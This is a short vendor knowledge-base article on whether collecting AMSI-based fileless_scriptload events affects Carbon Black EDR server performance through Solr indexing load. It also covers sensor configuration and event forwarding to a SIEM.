EDR: Does the Fileless_Scriptloads Data Impact the EDR Server Performance?
book
Article ID: 287666
calendar_today
Updated On:
Products
Carbon Black EDR (formerly Cb Response)
Issue/Introduction
Does the fileless_scriptloads event data impact the EDR Server's performance?
Environment
EDR Server: 7.6+
Resolution
During fileless_script data ingress, Solr may use more CPU/memory to process and index large chunks of data (up to 32KB).
During a fileless Process Search, Solr index should be efficient to handle searches of large as well as small fields. Optionally, use the SHA256 hash of the text instead of text itself.
Additional Information
The AMSI fileless_script is configurable within the sensor group settings, allowing customization of endpoints that require AMSI collection.
The fileless_scriptload event represents each occasion when the sensor detected AMSI-decoded script content that was executed by any process.
Only the fileless script content that was not stored in a file on the file system when the context was executed is sent to the EDR server.
The fileless_scriptload data is a new event type stored and indexed in Solr.
The fileless_scriptload event leverages the Anti-Malware Scanning Interface (AMSI)support that is available in Windows 10 RS2+ and Windows 2016.
To forward the information to the SIEM, check the box in the Event Forwarder > Events > Sensor > ingress.event.filelessscriptload.